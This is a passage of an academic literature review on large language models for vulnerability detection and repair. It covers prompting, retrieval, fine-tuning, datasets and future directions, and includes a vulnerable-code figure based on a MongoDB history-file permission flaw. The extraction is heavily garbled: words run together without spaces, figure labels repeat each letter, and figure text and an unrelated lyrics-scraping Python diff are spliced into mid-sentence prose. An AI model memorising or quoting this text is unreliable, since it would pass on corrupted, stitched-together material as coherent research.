mostdangerousCWEsof2022aspartofthepromptstohelpLLMsbetterunderstandthe ,Vol.1,No.1,Article.Publicationdate:October2024.14 Zhouetal. characteristicsofseriousvulnerabilities.Additionally,Khareetal.[43]specifiedthetypesof vulnerabilitieswhenqueryingLLMsaboutpotentialvulnerabilitiesintheprovidedcode. • Program-AnalysisAuxiliaryInformation.Somestudiesutilizeprogram-analysistoolstoextract codedependenciesfromtheinputcode,aimingtoenhanceLLMs’understandingoftheinput code.Specifically,Khareetal.[43]designedadataflowanalysis-basedpromptthatguidesthe modeltosimulateasource-sink-sanitizer-baseddataflowanalysisonthetargetcodesnippet beforepredictingifitisvulnerable.Zhangetal.[119]designedpromptsthatincorporate auxiliaryinformationondatafloworAPIcalls. • Chain-of-thought(CoT)Prompting.ItisproposedbyKojimaetal.[44]forimprovedreasoning, whichinvolvesadding“Let’sthinkstepbystep”totheoriginalprompt.Specifically,Zhouet
al.[130]andNietal.[63]addedthe“Let’sthinkstepbystep”intotheprompt. Few-shotPrompting.Inthisapproach,afewexamplesofinputandgroundtruthlabelpairsare providedtothelargelanguagemodels(LLMs)asadditionalguidance.Specifically,Nietal.[63] utilizebetween1and6few-shotlearningexamplestofillthefixedcontextwindow(i.e.,4,096 tokens).Zhouetal.[130]usetwofew-shotexamples. 5.3 RetrievalAugmentation(RAG). Retrievalaugmentationisatechniqueusedtoenhancethefew-shotprompting.Itinvolvesretrieving similarlabeleddatasamplesfromthetrainingsetwhengivenatestdatasampleandusingthese retrieveddataasexamplestoguidethepredictionofLLMsonthetestsample.Liuetal.[55]proposed usingefficientretrievaltoolssuchasBM-25andTF-IDFforretrieval.Zhouetal.[132]suggested usingCodeBERTasaretrievaltool.Thismethodfirsttransformscodesnippetsintosemanticvectors andthenquantifiesthesimilaritybetweentwocodesnippetsbycalculatingtheCosinesimilarity oftheirrespectivesemanticvectors.Itfinallyreturnedthetopsimilarcodebasedonthesimilarity scores.Duetal.[22]leverageaknowledge-levelretrieval-augmentationframeworkconsisting ofthreephasestoidentifyvulnerabilitiesinagivencode.First,theyconstructedavulnerability knowledgebasebyextractingmulti-dimensionalknowledgefromexistingCVEinstancesusing LLMs.Second,foragivencodesnippet,theyretrievedrelevantvulnerabilityknowledgefromthe constructedknowledgebasebasedonfunctionalsemantics.Finally,theyutilizedLLMstoassess thevulnerabilityofthegivencodesnippetbyreasoningaboutthepresenceofvulnerabilitycauses andproposingpotentialfixingsolutionsderivedfromtheretrievedknowledge.Wenetal.[105] firstretrievedthemostrelevantdependenciesfromcallgraphsbasedonagiveninputcode,and thenintegratedthesedependencieswiththeinputcodeintoLLMstodetectvulnerabilities. AnswertoRQ2:OuranalysisrevealedthreecommonlyusedtechniquestoadaptLLMsfor vulnerabilitydetection:includingfine-tuning(≈73%),promptengineering(≈17%),andretrieval augmentation(≈10%). 6 RQ3:HOWARELLMSADAPTEDFORVULNERABILITYREPAIR? RegardingtheusageofLLMs,wesummarizethreemajorcategoriesfromtheincludedstudies:1) fine-tuning(approximately63%),whichupdatestheparametersofLLMsusingalabeleddataset, and2)promptengineering(approximately37%),whichfreezestheparametersofLLMsand designspromptstoguideLLMsingeneratingrelevantresponses. Inthefollowingsubsection,wewillintroducedetailedcategoriesofLLMadaptationtechniques foreachofthefollowing:1)fine-tuningand2)promptengineering. ,Vol.1,No.1,Article.Publicationdate:October2024.AAuuttoommaatteedd SSeeaarrcchh IIEEEEEE XXpplloorree AACC LLMM iibb rrDD aaii rrgg yyiittaall SSpprriinnggeerrLLiinnkk WWiieellyy SSWW ccee iieebb nn ccoo eeff SScciieenn cccc tteeDDiirree AArrXXiivv LLMs Derive search strings 119977 ppaappeerrss 228855 ppaappeerrss 226666 ppaappeerrss 220055 ppaappeerrss 223377 ppaappeerrss 222200 ppaappeerrss 9900 ppaappeerrss Refine search strings Research Question Identify Export relevant venues Manual Search 1133 SSeelleecctteedd 44 SSeelleecctteedd ccoonnffeerreenncceess jjoouurrnnaallss Vulnerability Detection & Repair 2277 ppaappeerrss 88 ppaappeerrss Filter by page limit (pages > 5) LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 15 etaulavE tnemelpmoC Study Identification Manual Search Export 8833 ppaappeerrss FFoorrwwaarrdd BBaacckkwwaarrdd Study selection Export 5500 ppaappeerrss 3333 ppaappeerrss 11,,553355 AAdddd 1166 Total 58 papers ppaappeerrss ppaappeerrss Study Selection Remove Check the venue, Scan full-text to select After quality duplicate studies title, and abstract primary studies assessment 1,387 papers 1,332 papers 212 papers 82 papers 42 papers LLM+ Other Combining with DL Modules Program Analysis Data-centric Innovations Domain-specific Fine-tuning Pre-training (~73%) Default Fine-tuning LLM Usage Causal Learning for Vul. Detection Retrieval Augment- ation (~10%) Prompt Engineering (~17%) Encoder-only LLMs RQ1 Encoder-decoder only LLMs What LLMs are used? Model-centric Decoder-decoder only LLMs Data-Centric Innovations Innovations Domain-specific pretraining Default Fine-tuning Combining with program Domain-specific Fine-tuning analysis Pre-training (~63%) LLM + other DL modules Reinforcement RQ2 Learning How are LLMs used Data-centric designs and augmented in LLM Usage vulnerability detection? for Vul. Causal learning Repair Prompt Engineering LLM for Vulnerability Prompt engineering (~37%) Detection & Repair Retrieval Augmentation Fig.7. AdaptationTechniquesofLLMsforVul.Repair Domain-specific pretraining Diverse relevant inputs 6.1 Fine-tuning RQ3 Model-centric designs Somestudies[27,28]employdefaultfine-tuningmethodstoadaptLLMsforvulnerabilityrepair.In How are LLMs used thissubsection,wefocusonresearchthatintroducesadvancedfine-tuningtechniquesthatextend and augmented in vulnerability repair? Reinforcement learning beyondthedefaultapproachtoachieveimprovedeffectiveness. Regardingfine-tuning,wecategorizeadvancedadaptationtechniquesintofourgroupsbasedon Prompt engineering
thestagestheymainlytarget:Data-centricinnovations(datapreparation),Model-centricinnovations Retrieval Augmentation (modeldesign),Domain-specificpre-training(modeltraining),andReinforcementlearning(training optimization).Table3summarizestheexistingLLM-basedmethodsforvulnerabilityrepair. Vision Challe dn ig ree cs t a ion nd s future Data-CentricInnovations.Severalstudieshaveshownthatinadditiontotheinputvulnerable code,incorporatingotherdiverserelevantinputscanboosttheeffectivenessofLLMs.Specifically, theASTofthevulnerablecodeinput[133],vulnerabilitydescriptions[104,133],andvulnerable codeexamplessharedonCWEwebsites[128]canenhancetheLLMsinrepairingvulnerability. Inaddition,Weietal.[104]foundthatvulnerability-inducingcommitsandvulnerability-fixing commits can also improve the effectiveness of the model. Lastly, Zhou et al. [128] found that 14 src/mongo/shell/linenoise.cpp certainvulnerablefunctionsexceedthelengthlimitofTransformer-basedLLMslikeCodeT5(512 @@ -2762,7 +2762,17 @@ int linenoiseHistorySetMaxLen(int len) { 347 347 # Get the HTML fragment inside the appropriate HTML element and then subtokens)[128].Toaddressthislimitation,theyappliedtheFusion-in-Decoderframeworkto 348 348 # extract the text from it. 349 349 html_frag = extract_text_in(html, u"<div class='lyricbox'>") partitionalongcodefunctionintomultiplesegmentsandfeedthosesegmentsintoLLMsoneby 350 - lyrics = _scrape_strip_cruft(html_frag, True) 350 + if html_frag: one.Theirfindingsdemonstratedthatthosesegmentscanboostmodeleffectiveness.Additionally, 351 + lyrics = _scrape_strip_cruft(html_frag, True) 351 352 a study shows that removing less important parts of the code can help the model focus more 352 - if lyrics and 'Unfortunately, we are not licensed' not in lyrics: 353 - return lyrics effectivelyonthevulnerablelines,therebyimprovingperformance.Berabietal[12]presenteda 353 + if lyrics and 'Unfortunately, we are not licensed' not in lyrics: 354 + return lyrics methodforgeneratingreducedcodebyleveragingstaticanalysisoutcomes,creatingacompact representationoftheprogram.ThissmallerversionfitswithintheattentionwindowofanLLM whilepreservingthecrucialinformationrequiredtolearnacorrectfix.Thetechniqueensuresthat thereducedcodesnippetstillproducesthesamestaticanalysisreportastheoriginalprogram, maintainingthecoreproblemforeffectiveanalysis. Model-CentricInnovations.Model-centricinnovationsencompassmethodologiesthatprioritize revising the model architecture of LLMs (i.e., the Transformer [97]). Specifically, Fu et al. [25] drewinspirationfromVisionTransformer(VIT)-basedobjectdetectiontechniquesincomputer vision.Theyproposedvulnerabilityquerieswithinthepre-trainedTransformermodeltoidentify vulnerable code blocks within the source code. Additionally, they trained a model to learn a 1144 ssrrcc//mmoonnggoo//sshheellll//lliinneennooiissee..ccpppp CCVVEE--22001166--66449944 DDeettaaiill @@@@ --22776622,,77 ++22776622,,1177 @@@@ iinntt lliinneennooiisseeHHiissttoorryySSeettMMaaxxLLeenn((iinntt lleenn)) {{ DDeessccrriippttiioonn ,Vol.1,No.1,Article.Publicationdate:October2024. 22776622 //** SSaavvee tthhee hhiissttoorryy iinn tthhee ssppeecciiffiieedd ffiillee.. OOnn ssuucccceessss 00 iiss rreettuurrnneedd TThhee cclliieenntt iinn MMoonnggooDDBB uusseess wwoorrlldd--rreeaaddaabbllee ppeerrmmiissssiioonnss oonn ..ddbbsshheellll hhiissttoorryy 22776633 ** ootthheerrwwiissee --11 iiss rreettuurrnneedd.. **// ffiilleess,, wwhhiicchh mmiigghhtt aallllooww llooccaall uusseerrss ttoo oobbttaaiinn sseennssiittiivvee iinnffoorrmmaattiioonn bbyy rreeaaddiinngg 22776644 iinntt lliinneennooiisseeHHiissttoorryySSaavvee((ccoonnsstt cchhaarr** ffiilleennaammee {{ 22776655 -- FFIILLEE&&** ffpp == ffooppeenn((ffiilleennaammee,, ""wwtt""));; tthheessee ffiilleess.. 22776666 iiff ((ffpp ==== NNUULLLL)) {{ WWeeaakknneessss EEnnuummeerraattiioonn 22776677 rreettuurrnn --11;; 22776688 }} CCCWWWEEE---IIIDDD CCCWWWEEE NNNaaammmeee 22776699 22777700 ffoorr ((iinntt jj == 00;; jj << hhiissttoorryyLLeenn;; ++++jj)) {{ CCCWWWEEE---222000000 EEExxxpppooosssuuurrreee ooofff SSSeeennnsssiiitttiiivvveee IIInnnfffooorrrmmmaaatttiiiooonnn tttooo aaannn UUUnnnaaauuuttthhhooorrriiizzzeeeddd AAAccctttooorrr 22777711 iiff ((hhiissttoorryy[[jj]][[00]] !!== ''\\00'')) {{ 22777722 ffpprriinnttff((ffpp,, ""%%ss\\nn"",, hhiissttoorryy[[jj]]));; 22777733 }} VVuullTTeelllleerr
2 2 22 2 27 7 77 7 77 7 77 7 74 5 64 5 6 - - } f r} f rc ec el tl to uo us rs re ne n( ( f 0f 0p ;p ;));; T hT hiihh ssee ttoo rrFF yyII LL ffiiEE llee ssbb ,, ee aaffoo lllloorree ww ssVV llEE ooRR ccaaSS ll IIOO gguuNN ee ssdd tt oo ttooee ss rr eenn aaoo ddtt ssvv eeee nnrr ssiiff iiyy ttii vvtt eehhaa iitt nn ffuu ooss rrmmee aaoo ttiiff ootthh nnee bb pp yy ee rrrr eemm aaii ddss iiss nnii ggoo nn tthhss eeoo ssnn ee 22777777 }} ffiilleess..16 Zhouetal. Table3. ExistingLLM-basedMethodsforVulnerabilityRepair LLMs LLMAdaptationTechniques Data Deployment Data- Model- Domain Reinforce. Default Prompt Input Real-world& Interact Integrated Size centric centric Pre-training Learning Tuning Eng. Granularity Tests withUsers toWorkflow ✓ ✗ ✗ ✗ Chenetal.[17] <1B Function ✓ ✗ ✗ ✗ Chietal.[18] <1B Function ✓ ✗ ✗ ✗ Fuetal.[28] <1B Function ✓ ✗ ✗ ✗ Zhouetal.[133] <1B Function <1B, ✓ ✓ ✗ ✗ Wuetal.[110] 1-10B, Function >10B ✓ ✗ ✗ ✗ Fuetal.[29] >10B Function ✓ ✗ ✗ ✗ Zhangetal.[124] <1B Function <1B, ✓ ✓ ✗ ✗ Pearceetal.[74] 1-10B, Function >10B ✓ ✗ ✗ ✗ Weietal.[104] <1B Function ✓ ✗ ✗ ✗ Fuetal.[25] <1B Function ✓ ✗ ✗ ✗ Islametal.[39] 1-10B Function ✓ ✗ ✗ ✗ Fuetal.[27] <1B Function ✓ ✓ ✗ ✗ ✗ Zhouetal.[128] <1B Function ✓ ✗ ✗ ✗ Nongetal.[69] >1B Function ✓ ✗ ✗ ✗ Berabietal.[12] >1B Function ✓ ✗ ✗ ✗ Ahmadetal.[9] >10B Function ✓ ✗ ✓ ✗ Islametal.[38] <10B Function ✓ ✗ ✗ ✗ Nongetal.[70] >10B Function ✓ ✗ ✗ ✗ Wangetal.[102] >1B Function vulnerabilitymask,enhancingtheattentionofthevulnerabilityqueriesonthevulnerablecodeareas. Islametal.[38]proposedfine-tuninganLLM(CodeGen2[66])toperformtwotaskssimultaneously. First,themodelgeneratesafixforthevulnerablecode,andsecond,itproducesadeveloper-friendly descriptionofthecodeasanexplanation. Domain-specificPre-training.Domain-specificpre-traininginvolvespre-traininganLLMondata specifictoaparticulardomainbeforefine-tuningitforthetargettask.Consideringthesimilarity betweenbug-fixingandvulnerability-fixingtasks,severalstudies[17,18,124,128]consideredthe taskofbug-fixingasapre-trainingtasktoenhanceLLMs.Specifically,theyfirstpre-trainedLLMs onabugfixcorpustofixbugs,andthenfine-tunedLLMsonavulnerabilityfixdatasettorepair vulnerabilities.Thiskindofpre-trainingtechniquecanbeconsideredasTransferLearning. ReinforcementLearning.Islametal.[39]introducedSecureCode,anLLMtunedusingare- inforcement learning framework. This approach integrated syntactic and semantic rewards to generatefixesforvulnerablecode.Specifically,theyleveragedtheCodeBLEU[80]scoreasthe syntacticrewardandBERTScore[125]asthesemanticreward.Aftercombiningtheserewards,they appliedtheProximalPolicyOptimization(PPO)algorithm[82]tofine-tunetheCodeGen2-7B[67] model. 6.2 PromptEngineering. Zero-shot Prompting. For zero-shot prompting, researchers have sought to create effective promptsthatguideLLMsinperformingvulnerabilityrepair.Promptengineeringtypicallyincludes componentsoutlinedbelow: • VulnerabilityDescriptions.Thiscomponentprovidesspecificdetailsaboutthetypesofvulner- abilitiestobeaddressed,helpingtheLLMunderstandthenatureoftheissueswithinthecode. Specifically,Pearceetal.[74]proposetouseaformatlike“//BUG:[vulnerability-description]” toprovidethedescriptionsonthevulnerability.Ahmadetal.[9]providedthebugdescription ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 17 withexplicitinstructionsforrepairwithLLMs,asillustratedintheprompt:“//BUG:Access ControlCheckImplementedAftertheAssetisAccessed.//Ensurethataccessisgranted beforedataisaccessed”. • VulnerabilityLocation.Thiselementindicatesthespecificsectionsofthecodewherevul- nerabilitiesmayexist.Wuetal.[110]proposedapromptthatbeginsbycommentingon thebuggycodelinesandadds"BUG:"tohighlightthem,whichprovidesthelocationofthe vulnerabilitytoLLMs. • Vulnerability-RelatedAuxiliaryInformation.Thiscomponentencompassesauxiliaryinforma- tionaboutvulnerabilities.Nongetal.[69]incorporatevulnerabilitysemantics—specifically, thebehaviorsofavulnerableprogramthatcontributetoitssusceptibility—intotheprompt toenhancetheperformanceofLLMs. • Program-AnalysisAuxiliaryInformation.Wangetal.[102]proposedaprogram-analysis-based approach.Givenapatch,theirmethodfirstutilizesboththevulnerablecodeanditsfixed versionasinput.TheprocessbeginsbylocalizingtheMinimumEditNode(MEN),whichisthe commonancestornodeofallmodifiednodes.OncetheMENisidentified,customizedrules areappliedbasedontheMENtypetoextractvulnerablecodepatterns.Thesepatternsare thenincorporatedintotheprompttoassistLLMsingeneratingmoreeffectivevulnerability fixes. Few-shotPrompting.Furthermore,forfew-shotprompting,Fuetal.[29]investigatedastraight- forwardpromptstrategyinvolvingtheprovisionofthreerepairexampleswithineachprompt.This approachaimedtoaidGPT-3.5andGPT-4inperformingtherepairtaskmoreeffectively.Nonget
al.[70]proposedanovelfew-shotpromptingmethod.Givenavulnerableprogramwithaknown vulnerabilitylocation,theyfirstnarrowedtheanalysisscopetoonlytherelevantsubsetofthe program.Next,theyelicitedtheLLMtoidentifythevulnerability’srootcausewithinthisreduced scope,dynamicallyselectingexemplarsfromapre-mineddatabasethatbestfittheprogram.With thechosenexemplars,theyformedthepatchingprompttogeneratepatcheswithLLMs. AnswertoRQ3:OuranalysisrevealedthreecommonlyusedtechniquestoadaptLLMsfor vulnerabilityrepair:includingfine-tuning(≈63%)and promptengineering(≈37%). 7 RQ4:WHATARETHECHARACTERISTICSOFDATASETSANDDEPLOYMENT? Atypicallearning-basedpipelinecanbedividedintothreephases:1)datapreparation,2)model construction,and3)deployment.ThepreviousRQsprimarilyfocusonthemodelconstruction phase.InthisRQ,wefocusonexaminingthecharacteristicsofthedatasetsused,aswellasthe deploymentstrategiesemployedinLLM-basedvulnerabilitydetectionandrepairstudies. 7.1 DataCharacteristics InourinvestigationofthedatautilizedinLLM-basedvulnerabilitydetectionandrepairstudies,we primarilyfocusontwoaspects:1)inputcodesizeand2)dataquality. 7.1.1 InputGranularity. Inputgranularityreferstothesizeorscopeofthecodeprovidedtothe modelforvulnerabilitydetectionandrepair.Forexample,inavulnerabilitydetectiontaskwith repo-level input granularity, the entire repository is given to the model, and it is tasked with identifyingvulnerabilitieswithinthatrepository.Inputgranularitycanvaryfromtheline-level, function-level,andclass-leveltorepo-level. Forvulnerabilitydetection,asshowninTable2,themajorityofstudiesconcentrateonfunction- levelvulnerabilitydetection,withonly7addressingline-leveldetection.Thefunction-levelapproach ,Vol.1,No.1,Article.Publicationdate:October2024.18 Zhouetal. analyzesentirefunctionsforpotentialvulnerabilities,whereasline-leveldetectionexaminesspecific linesofcode,whichcanbeadvantageousforpinpointingfine-grainedlocationsofvulnerabilities. Regardingvulnerabilityrepair,Table3revealsthatallstudiestargetfunction-levelrepairs. However,thereisanotablegapinresearchexploringlargerinputgranularityforbothvulnera- bilitydetectionandrepairs,suchasclass-levelandrepo-levelapproaches.Largerinputgranularity isessentialforidentifyingvulnerabilitiesthatspanmultiplefunctions.Specifically,thereareno studiesfocusedonclass-levelvulnerabilitydetectionandrepair.Forrepo-leveldetection,onerecent work[130]initiallyexploredtheuseofLLMs(e.g.,CodeLlama)todetectvulnerabilitiesacross entirerepositories,comparingtheirperformancewithSASTtools(e.g.,CodeQL).Notably,noneof thestudiedpapersinvestigaterepo-levelvulnerabilityrepair.Overall,researchonvulnerability detectionandrepairforlargerinputgranularityremainslimited. 7.1.2 DataQuality. Weseparatelyinvestigatethedataqualityissuesinvulnerabilitydetection andrepair.Specifically,wefindthatvulnerabilitydetectionstudiesprimarilyutilizedatasetswith labelsgeneratedbyheuristic-basedmethods.Additionally,vulnerabilityrepairstudiesoftenrely ondatasetsthatlacktestcases,makingitdifficulttofullyevaluatethecorrectnessofthegenerated repairssincetherecanbemultiplecorrectfixes. Vulnerabilitydetectionstudiesmainlyrelyondatasetsusingheuristic-basedlabeling methods.Table2showsthatmanystudieshaveemployedheuristic-basedlabelingfunctionsto generatedataforvulnerabilitydetectiontasks.Typically,theycollectvulnerability-fixingcommits fromdatabaseslikeNVDandlabelthepre-commitversionsofthefunctionsmodifiedbythese commitsasvulnerable.Additionally,allunchangedfunctionsinthesamefilesarelabeledasnon- vulnerable.Inthisway,thevulnerablefunctionsarethoseinthefilesaffectedbyvulnerability-fixing commits.However,recentstudies[16,19,65]havehighlightedqualityissueswithvulnerability datageneratedbytheheuristic-basedmethod,includingnoisyorincorrectlabels(e.g.,labeling cleancodeasvulnerable). Vulnerabilityrepairstudiesmainlyrelyondatasetswithouttestcases.AspresentinTable3, obtainingreal-worldvulnerabilitydataalongwithcorrespondingtestcasesischallenging.Most studieseitherutilizesyntheticvulnerablecodeandthecorrespondingfixes(e.g.,[39])orusereal- worldvulnerablecodeandfixeswithouttestcases(e.g.,[17,18,28]).Tworecentstudies[74,110] utilizedreal-worldvulnerability-fixingdatasetswithtestcases,however,thenumberofsamples isverylimited,withonly42and12samplesbeingevaluated,respectively.Thisunderscoresthe urgentneedformoreextensivereal-worlddatasetsandaccompanyingtestcases. 7.2 DeploymentStrategies InourinvestigationofthedeploymentstrategiesutilizedinLLM-basedvulnerabilitydetection andrepairstudies,wefocusontwokeyaspects:1)thecommunicationandcollaborationbetween developers and LLM-based methods, and 2) the integration of these methods into developers’ workflows. We focus on the communication and collaboration between users and LLM-based methodsbecausetheyareessentialindeployingLLMsinpracticeandarepivotalinmaximizing
thereal-worldvalueofLLMs[114].Moreover,arecentsurvey[52]showsthatdevelopersdesire opportunitiesfornaturallanguageinteractionwithLLM-basedsolutions,alsohighlightingthe significanceofthiscapability.Inaddition,seamlessintegrationofthesesolutionsintodevelopers’ workflowsiscrucialforsuccessfuldeployment.Arecentstudy[118]foundthatevenforthepopular LLM-basedtoolGitHubCopilot,thetop1limitationreportedisthedifficultyofintegratingCopilot withIDEsorotherplugins.ThisemphasizestheneedforbettersupportinintegratingLLM-based toolswithotherfrequentlyusedtoolsindevelopers’workflowssuchasIDEs. ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 19 Firstly,asshowninTable2,limitedstudiesonvulnerabilitydetectioninourreviewsupport communicationorcollaborationbetweendevelopersandLLM-basedmethods.Oneexceptionis astudy[113]wherethemethodgeneratesexplanationsforvulnerabilitiesduringthedetection process. However, interaction and communication with developers are essential; for instance, unexplained suggestions may be disregarded, as developers need to understand the rationale behind the recommendations to trust and implement them effectively. In vulnerability repair studies(asshowninTable3),mostalsodonotsupportcommunicationbetweendevelopers.An exceptionisarecentstudybyIslametal.[38],whichprovidesexplanationsforthefixeswhen addressingvulnerabilities. Secondly,asillustratedinTable2andTable3,allstudiesinourreviewarenotintegratedinto developers’workflowsandtoolsbutareevaluatedonlyofflineusingstaticandhistoricaldata.For thesesolutionstobeeffectivelyadopted,theyshouldseamlesslyintegrateintoexistingdevelopment environmentsandtools. AnswertoRQ4:ThedatasetsusedinLLM-basedvulnerabilitydetectionandrepairstudies primarily focus on function-level or line-level inputs, with limited exploration of class or repositorylevel.Manyvulnerabilitydetectiondatasetsemployheuristic-basedlabelingmethods, andrepairdatasetsfrequentlylackassociatedtestcases.Furthermore,currentapproachesdo notemphasizeintegrationwithdeveloperworkflowsorinteractionandcollaborationbetween developersandLLM-basedmodels. 8 THEROADAHEAD Inthissection,wefirstdiscussthelimitationsofcurrentstudiesandthenintroducearoadmap, illustratingtheresearchtrajectoryshapedbypriorworkandhighlightingfuturedirectionsfor exploration. 8.1 Limitations Limitation1:SmallInputGranularity.Currently,LLM-basedvulnerabilitydetectionandrepair solutionsprimarilytargetthefunctionlevel(ormorefine-grained,atthelinelevel).However,this smallinputgranularityindicatesthattheseapproachesmaynotperformoptimallywhenpresented withawiderrangeofprograms,suchasclassesorawholerepository.Function-levelvulnerability detectionapproachescouldoverlookvulnerabilitiesthatspanmultiplefunctionsorclasses[84]. Similarly,function-levelvulnerabilityrepairapproachesfallshortwhentaskedwithmodifications acrossmultiplefunctionswithintherepository[128].Inadditiontofunctions,futureresearchcould proposeLLM-baseddetection/repairapproachescapableofhandlingabroaderrangeofprograms. Limitation2:LackofHigh-qualityVulnerabilityDataset.Onemajorchallengeisthelack ofhigh-qualityvulnerabilitydatasets.Forvulnerabilityrepair,previousstudies[16,19,65]have highlightedissueswithexistingvulnerabilitydata,includingnoisyorincorrectlabels(e.g.,labeling cleancodeasvulnerable).Thisdataqualityissueisprimarilyattributedtotheuseofautomatic vulnerabilitycollection[65],whichcangatherlargeenoughdatafortrainingDL-basedmodels includingLLMsbutcannotensurethecompletecorrectnessofthelabels.Whilemanuallychecking eachdatasamplecanensurehighquality,itisaverytediousandexpensiveprocess,especially when aiming for a large dataset. Constructing a high-quality vulnerability detection benchmark remainsanopenchallengetodate. Forvulnerabilityrepair,moststudieseitherutilizesyntheticdata(e.g.,[39])orusereal-worlddata withouttestcases(e.g.,[17,18,28]).Therelianceonsyntheticdatacanlimitthegeneralizabilityof ,Vol.1,No.1,Article.Publicationdate:October2024.20 Zhouetal. thefindings,asitmaynotaccuratelyreflectthecomplexitiesandnuancesofactualvulnerabilities encounteredinproductionenvironments.Ontheotherhand,real-worlddatawithouttestcases makesitdifficulttoevaluatetheeffectivenessofproposedsolutionscomprehensively,astheabsence oftestcaseshamperstheabilitytoverifythecorrectnessofthevulnerabilityrepairs.Thereisan urgentneedforlargereal-worldvulnerability-fixingdatasetsthatincludetestcases. Moreover,thereisagrowingconcernthatthecapabilitiesofLLMsmayderivefromtheinclusion ofevaluationdatasetsinthepre-trainingcorpusofLLMs,aphenomenonknownasdatacontami- nation[40].Tomitigatethisconcern,high-qualityvulnerabilitydetection/fixingbenchmarksare preferredtohavenooverlapwiththepre-trainingcorpusofLLMs. Limitation 3: Suboptimal Performance Caused by Complexity in Vulnerability Data. Vulnerabilities can be inherently complicated, which brings challenges for their detection and repairwithLLMs.Forinstance,inter-proceduralvulnerabilitiesareprevalentinvulnerabilitydata,
andLietal.[51]discoveredthatdetectinginter-proceduralvulnerabilitiesposesgreaterchallenges thanintra-proceduralones.Moreover,vulnerabilitiesencompassawidearrayofCommonWeakness Enumeration(CWE)types[129],butLLMsmaystrugglewithlessfrequentCWEtypescompared tofrequenttypes[128,129].Inaddition,vulnerabilitiesaretypicallyrepresentedintermsofcode units,suchascodelines,functions,orprogramsliceswithinwhichthevulnerabilitiesoccur.Sejfia etal.[84]observedasignificantaccuracydropwhendetectingvulnerabilitiesthatspanmultiple codeunits,suchasspanningmultiplefunctions.Futureresearchshouldconsiderthecomplexnature ofvulnerabilitieswhendesigningLLM-basedsolutions. Limitation 4: Reliance on Lightweight LLMs. As highlighted in Table 2 and Table 3, most studiesadaptedlightweightLLMs(#parameter<1B)forvulnerabilitydetectionandrepair.For lightweight LLMs like CodeBERT, researchers have explored various strategies to boost their performance,includingdata-centricenhancements,model-centricinnovations,integrationwith programanalysis,combiningLLMswithotherdeeplearningmethods,domain-specificpre-training, causallearning,andreinforcementlearning.Insomecases,suchasLiuetal.[56],multipletechniques havebeencombinedtoachieveevengreaterperformance,highlightingtheversatilityandpotential oflightweightmodels.Incontrast,theuseoflargeLLMs(withover1billionparameters)remains relativelylimitedcomparedtolightweightLLMs,leavingalargeroomtoexplore. Limitation 5: Lack of Deployment Consideration. We examine two crucial aspects of de- ployment:1)interactionwithdevelopersand2)integrationintodevelopers’currentworkflows. Currently,noneofthestudiesinourreviewhavebeenincorporatedintodevelopers’workflows; instead,theyprimarilyrelyonstaticandhistoricaldatatoevaluatetheireffectiveness.Moreover, limited studies in our review incorporate interaction with developers, such as engaging with developersthroughfeedbackorexplainingtherationalebehindvulnerabilitydetection.Limited interactionbetweendevelopersandLLM-basedsolutionsmayimpedetheestablishmentoftrustand collaborationduringpracticalapplications.Thislackofinteractivefeaturesrestrictsthepractical applicabilityofthesemodelsinreal-worldscenarios,whereeffectivevulnerabilitymanagement reliesoncollaborationbetweenautomatedtoolsanddevelopers. Toaddressthesegaps,futureresearchshouldexploremoreeffectivestrategiesforfostering collaborationandtrustbetweendevelopersandLLM-basedsolutions[57].Additionally,seamlessly integratingLLM-basedsolutionscanenablethemtoevolveintointelligentpartners,providing enhancedsupporttodevelopers. Limitation 6: Lack of High Accuracy and Robustness. A vulnerability detection or repair solution with high accuracy is generally preferred, as it boosts developers’ confidence in the reliability of detections and fixes. However, current state-of-the-art approaches [56, 128] have ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 21 Data Data Labeling LLM Choices LLM Adaptation Deployment Granularity Fine-tuning- Line/Method- Heuristic-based Lightweight No Deployment based Level Label LLMs (<1B) Adaptation Interacted with Class-level With Test Cases Developers Prompting- Large LLMs (>=1B) based Integrated with Repo-level Manually Adaptation Workflow Verified Label Customized High Robustness Expert LLM for LLM Agents and High Annotated Vulnerability Accuracy … … … … Fig.8. RoadmapandFutureDirections not yet achieved satisfactory accuracy, with 67.6% and 20% accuracy scores for vulnerability detectionandrepair,respectively.Moreover,thesolutionshouldmaintainrobustnessagainstdata perturbationsoradversarialattackstoensureitsresilience.However,Yangetal.[116]andRahman etal.[59]discoveredthatLLMsarenotrobustagainstdataperturbations.Futureresearchshould seekwaystoimprovetheaccuracyandrobustnessofLLM-basedsolutions. 8.2 Roadmap Figure 8 presents the roadmap. The green modules highlight the aspects that existing studies haveprimarilyfocusedon,whilethegraymodulesrepresentareasthathavenotbeenextensively exploredbutwarrantfurtherinvestigation.Thesolidblacklinesrepresentthetrajectoriesfollowed bymostexistingLLM-basedmethodsforvulnerabilitydetectionandrepair,whilethegraydotted lineshighlightrelativelyunder-exploredpathsthatcouldofferpromisingdirectionsforfuture researchinvulnerabilitydetectionandrepair. 8.2.1 EstablishedPathwaysinCurrentStudies. AsshowninbothTable2–3andthesolidblacklines inFigure8,theexistingmethodstypicallyleverageeitherlightweightLLMsorlargeLLMsadapted usingtechniquessuchasfine-tuningorprompting.Theexistingmethodsoftenfocusonmethod- levelorline-levelanalysis.Thedatasetsusedareusuallycollectedfromheuristicapproachesfor vulnerabilitydetectionorreal-worlddatawithouttestcasesforvulnerabilityrepair.Finally,these methodsusuallyneglectdeploymentconsiderations,suchasensuringeffectiveinteractionwith developers. 8.2.2 PathForward. AsshowninFigure8,therearemanypromisingyetunder-exploredmod- ules(highlightedingreen)andpaths(representedbythegraydottedlines.)Lookingahead,we canoutlinethreeprogressivelyadvancedstagesforexploringnewdirections.Inthefirststage, researcherscanstudytheseunder-exploredmodulesindividually.Inthesecondstage,theycan
